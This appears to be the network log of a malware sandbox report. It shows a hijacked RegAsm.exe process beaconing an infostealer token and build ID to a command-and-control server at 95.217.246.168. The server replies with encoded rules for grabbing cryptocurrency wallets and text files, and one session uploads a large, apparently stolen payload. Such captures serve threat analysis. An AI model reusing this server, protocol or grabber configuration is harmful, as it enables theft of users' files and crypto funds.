2024-04-26 19:35:46 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-26 19:35:46 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:47 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------FIDGDAKFHIEHJKFHDHDBContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------FIDGDAKFHIEHJKFHDHDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------FIDGDAKFHIEHJKFHDHDBCont
2024-04-26 19:35:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:48 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:49 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIII User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------FHCAFIDBKEBFCBFIIIIIContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------FHCAFIDBKEBFCBFIIIIIContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------FHCAFIDBKEBFCBFIIIIICont
2024-04-26 19:35:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:50 UTC	131	IN	Data Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:51 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:51 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IDAAFBGDBKJJJKFIIIJJCont
2024-04-26 19:35:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:53 UTC	265	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 98729 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:53 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------JDGHIIJKEBGIDHIDBKJDCont
2024-04-26 19:35:53 UTC	16355	OUT	Data Raw: 74 49 52 51 41 6c 42 6f 6f 6f 30 47 4a 52 52 52 51 4d 53 6b 70 31 4a 69 69 34 43 55 6c 4f 78 54 54 51 4d 4b 53 6c 6f 6f 47 4e 4e 46 4c 53 55 44 44 74 53 55 75 4b 54 46 41 78 4b 53 6e 55 6d 4b 51 43 55 6c 4c 31 70 4b 42 69 64 36 54 74 54 71 51 69 67 6f 51 30 6c 4f 4e 49 52 51 4d 62 30 4e 46 4b 61 54 72 51 41 6e 57 6b 49 70 32 4d 55 30 69 67 6f 4b 51 38 69 6c 78 53 66 51 59 6f 41 4b 53 6c 78 7a 6d 69 67 59 32 69 6c 70 4f 2f 39 61 42 69 48 6b 55 48 6b 55 74 46 41 78 75 66 78 46 4a 30 70 78 37 30 33 48 46 41 77 2f 43 6a 72 2f 38 41 58 70 65 63 65 74 49 65 66 61 67 59 68 35 6f 78 6d 6c 2f 53 6b 78 6e 2f 41 41 6f 41 54 38 50 7a 6f 36 30 55 70 6f 47 4e 78 78 33 70 4f 31 4f 50 76 53 47 6d 41 6c 42 48 72 52 30 6f 50 74 53 47 4a 2f 6b 30 67 2f 47 6e 48 6d 6d 30 77 Data Ascii: tIRQAlBooo0GJRRRQMSkp1Jii4CUlOxTTQMKSlooGNNFLSUDDtSUuKTFAxKSnUmKQCUlL1pKBid6TtTqQigoQ0lONIRQMb0NFKaTrQAnWkIp2MU0igoKQ8ilxSfQYoAKSlxzmigY2ilpO/9aBiHkUHkUtFAxufxFJ0px703HFAw/Cjr/8AXpecetIefagYh5oxml/Skxn/AAoAT8Pzo60UpoGNxx3pO1OPvSGmAlBHrR0oPtSGJ/k0g/GnHmm0w
2024-04-26 19:35:53 UTC	16355	OUT	Data Raw: 43 57 4a 39 57 65 4d 2b 54 62 52 6e 64 35 53 6e 71 7a 66 79 2f 78 37 66 57 35 6a 6d 47 47 6f 34 57 63 35 53 54 56 6d 5a 34 58 44 56 70 56 6f 71 31 74 54 53 75 67 71 58 6b 79 4c 39 31 5a 47 41 2b 6d 61 77 50 45 67 42 73 49 6a 33 45 6f 48 36 47 74 63 73 53 53 53 63 6b 38 6d 75 66 38 41 45 63 34 4c 51 77 41 39 4d 75 33 39 50 36 31 2b 54 63 4d 78 6c 57 7a 69 6b 34 64 47 33 36 4b 7a 2f 77 43 47 50 71 4f 49 5a 78 70 5a 5a 55 35 75 71 53 2b 64 30 59 56 4a 7a 53 30 56 2b 31 6e 35 47 46 4e 38 4d 58 2f 39 6e 66 45 65 78 6c 4a 77 73 6b 71 77 74 2f 77 4e 64 76 38 41 4d 67 2f 68 54 71 35 33 55 4a 48 68 31 64 70 55 4a 56 30 5a 57 55 2b 68 41 46 5a 56 6f 4b 64 4e 78 66 55 39 54 4b 5a 63 75 49 35 75 79 2f 56 48 72 75 6d 61 66 42 6f 74 76 4a 34 61 6c 56 51 64 62 75 4c 34 Data Ascii: CWJ9WeM+TbRnd5Snqzfy/x7fW5jmGGo4Wc5STVmZ4XDVpVoq1tTSugqXkyL91ZGA+mawPEgBsIj3EoH6GtcsSSSck8muf8AEc4LQwA9Mu39P61+TcMxlWzik4dG36Kz/wCGPqOIZxpZZU5uqS+d0YVJzS0V+1n5GFN8MX/9nfEexlJwskqwt/wNdv8AMg/hTq53UJHh1dpUJV0ZWU+hAFZVoKdNxfU9TKZcuI5uy/VHrumafBotvJ4alVQdbuL4
2024-04-26 19:35:53 UTC	16355	OUT	Data Raw: 31 62 6a 47 49 70 57 51 59 39 69 52 57 2b 45 7a 43 4f 4a 6d 34 4a 57 30 75 63 65 50 79 69 65 43 70 4b 70 4b 53 64 33 62 38 2f 38 41 49 72 55 6c 4c 52 58 65 65 53 4a 53 34 6f 37 55 55 41 64 58 42 34 43 76 72 69 32 69 6e 53 37 74 67 73 69 42 77 44 75 7a 67 6a 50 70 54 2f 38 41 68 58 6d 6f 2f 77 44 50 35 61 2f 6d 33 2b 46 64 35 70 66 2f 41 43 43 4c 4c 2f 72 33 6a 2f 38 41 51 52 56 48 55 2f 46 57 68 36 52 4e 35 4e 37 71 4d 55 63 6f 36 6f 6f 4c 73 50 71 46 42 49 2f 47 76 6c 6f 59 2f 47 54 64 6f 75 37 39 46 2f 6b 66 65 7a 79 66 4c 6f 4b 38 6f 57 58 71 2f 77 44 4d 34 32 66 77 48 66 32 39 76 4c 4d 31 31 61 6c 59 30 4c 6b 41 74 6e 41 47 66 53 75 66 31 48 54 72 6a 53 37 78 72 61 35 54 44 4c 30 50 5a 68 36 69 76 53 6f 66 45 6d 69 36 39 62 7a 32 65 6e 36 6a 44 4a 50 Data Ascii: 1bjGIpWQY9iRW+EzCOJm4JW0ucePyieCpKpKSd3b8/8AIrUlLRXeeSJS4o7UUAdXB4Cvri2inS7tgsiBwDuzgjPpT/8AhXmo/wDP5a/m3+Fd5pf/ACCLL/r3j/8AQRVHU/FWh6RN5N7qMUco6ooLsPqFBI/GvloY/GTdou79F/kfezyfLoK8oWXq/wDM42fwHf29vLM11alY0LkAtnAGfSuf1HTrjS7xra5TDL0PZh6ivSofEmi69bz2en6jDJP
2024-04-26 19:35:53 UTC	16355	OUT	Data Raw: 7a 30 74 59 32 39 78 57 55 54 53 5a 6f 39 6c 46 68 79 6d 32 6d 70 32 4c 48 35 34 4a 56 2f 77 42 31 73 31 59 53 35 30 79 54 2f 6c 35 65 4d 2f 37 61 56 7a 52 6b 56 61 61 5a 2f 51 56 4c 6f 4c 75 48 73 32 39 6a 72 6c 68 74 35 44 69 47 2b 67 50 73 57 78 56 36 31 73 6e 74 31 6e 6b 5a 30 4b 2b 53 32 43 72 64 38 56 35 38 38 78 7a 54 56 75 5a 6b 7a 74 6b 64 63 38 59 42 72 4b 64 43 54 56 6c 49 62 77 38 6d 74 78 73 6e 33 6a 30 71 50 36 30 37 4f 63 65 6c 4e 50 70 2b 74 64 46 7a 72 53 30 45 4a 34 70 44 2b 4e 48 54 76 52 53 4b 51 32 67 38 48 74 51 54 67 30 55 46 41 66 63 34 70 76 53 6e 55 33 76 78 53 47 48 66 6d 67 6e 6a 2f 43 67 47 6b 50 50 76 53 41 54 38 71 54 50 31 50 76 53 30 6d 4b 43 67 2b 74 49 52 39 4b 58 72 2b 64 49 66 65 67 42 42 7a 37 65 39 46 41 48 4e 41 35 Data Ascii: z0tY29xWUTSZo9lFhym2mp2LH54JV/wB1s1YS50yT/l5eM/7aVzRkVaaZ/QVLoLuHs29jrlht5DiG+gPsWxV61snt1nkZ0K+S2Crd8V588xzTVuZkztkdc8YBrKdCTVlIbw8mtxsn3j0qP607OcelNPp+tdFzrS0EJ4pD+NHTvRSKQ2g8HtQTg0UFAfc4pvSnU3vxSGHfmgnj/CgGkPPvSAT8qTP1PvS0mKCg+tIR9KXr+dIfegBBz7e9FAHNA5
2024-04-26 19:35:53 UTC	16355	OUT	Data Raw: 4e 4c 53 55 44 43 69 69 67 30 41 4a 53 47 6c 70 4b 42 68 51 61 4b 44 51 4d 53 69 69 69 67 59 6c 42 6f 6f 4e 4d 42 44 53 55 74 49 61 42 68 53 55 70 70 4b 42 68 53 55 74 4a 51 41 55 47 69 6b 6f 47 46 4a 53 30 6c 4d 59 47 6b 6f 6f 6f 47 4a 52 52 33 6f 6f 41 53 6b 4e 4c 33 70 4b 42 68 53 55 70 70 4b 42 68 53 55 74 4a 51 4d 4b 53 69 6b 4e 41 77 70 4b 57 6b 6f 41 4b 51 30 74 4a 51 4d 44 53 55 55 68 6f 47 46 42 6f 6f 4e 41 78 4b 54 76 51 61 4b 42 69 55 55 55 55 44 45 6f 4e 46 42 6f 47 4a 53 55 47 69 6d 43 41 30 6c 4b 61 53 6b 4d 53 6b 70 61 53 67 6f 54 76 51 61 42 52 51 41 6c 4a 69 6c 70 4b 5a 51 64 71 53 6c 70 4b 41 45 6f 6f 70 4b 42 68 53 55 64 71 44 51 55 46 49 61 44 53 47 67 41 70 4b 57 6b 6f 47 46 4a 53 30 68 7a 53 47 68 4b 4b 4f 2f 4e 47 4d 30 79 68 4b 43 Data Ascii: NLSUDCiig0AJSGlpKBhQaKDQMSiiigYlBooNMBDSUtIaBhSUppKBhSUtJQAUGikoGFJS0lMYGkoooGJRR3ooASkNL3pKBhSUppKBhSUtJQMKSikNAwpKWkoAKQ0tJQMDSUUhoGFBooNAxKTvQaKBiUUUUDEoNFBoGJSUGimCA0lKaSkMSkpaSgoTvQaBRQAlJilpKZQdqSlpKAEoopKBhSUdqDQUFIaDSGgApKWkoGFJS0hzSGhKKO/NGM0yhKC
2024-04-26 19:35:53 UTC	599	OUT	Data Raw: 77 38 53 36 72 70 73 57 6b 61 46 6f 31 31 39 6a 76 55 68 66 55 72 36 35 44 62 66 73 35 64 50 76 46 68 6b 72 73 68 77 63 6a 6e 35 79 42 79 65 65 4c 6a 76 62 71 47 65 53 65 4f 35 6d 57 57 51 4d 73 6a 68 7a 6c 77 33 33 67 54 33 42 37 35 36 31 61 58 78 42 72 45 65 72 7a 61 72 44 71 56 31 42 66 7a 45 37 37 69 33 6c 4d 54 48 50 55 66 4c 6a 41 36 63 44 6a 67 55 57 43 35 36 64 42 72 73 31 32 59 39 53 30 47 65 34 6b 75 4a 74 61 73 72 43 34 75 64 70 57 53 38 6a 57 48 47 5a 42 33 45 6a 42 69 51 65 75 42 6e 6b 56 6c 33 30 73 31 6a 62 61 70 6f 6c 78 71 55 63 64 68 71 63 7a 57 32 6b 57 45 73 6d 32 43 47 4c 37 51 54 39 70 62 2b 46 41 4e 72 41 4e 39 34 35 4a 36 63 6e 69 54 34 6f 38 51 4e 63 7a 58 4c 61 37 71 5a 75 4a 6f 2f 4b 6c 6c 4e 33 4a 75 64 50 37 72 48 4f 53 76 4a Data Ascii: w8S6rpsWkaFo119jvUhfUr65Dbfs5dPvFhkrshwcjn5yByeeLjvbqGeSeO5mWWQMsjhzlw33gT3B7561aXxBrEerzarDqV1BfzE77i3lMTHPUfLjA6cDjgUWC56dBrs12Y9S0Ge4kuJtasrC4udpWS8jWHGZB3EjBiQeuBnkVl30s1jbapolxqUcdhqczW2kWEsm2CGL7QT9pb+FANrAN945J6cniT4o8QNczXLa7qZuJo/KllN3JudP7rHOSvJ
2024-04-26 19:35:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:56 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IIEBKJECFCFBFIECBKFBCont
2024-04-26 19:35:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:57 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------GIDBKKKKKFBGDGDHIDBGCont
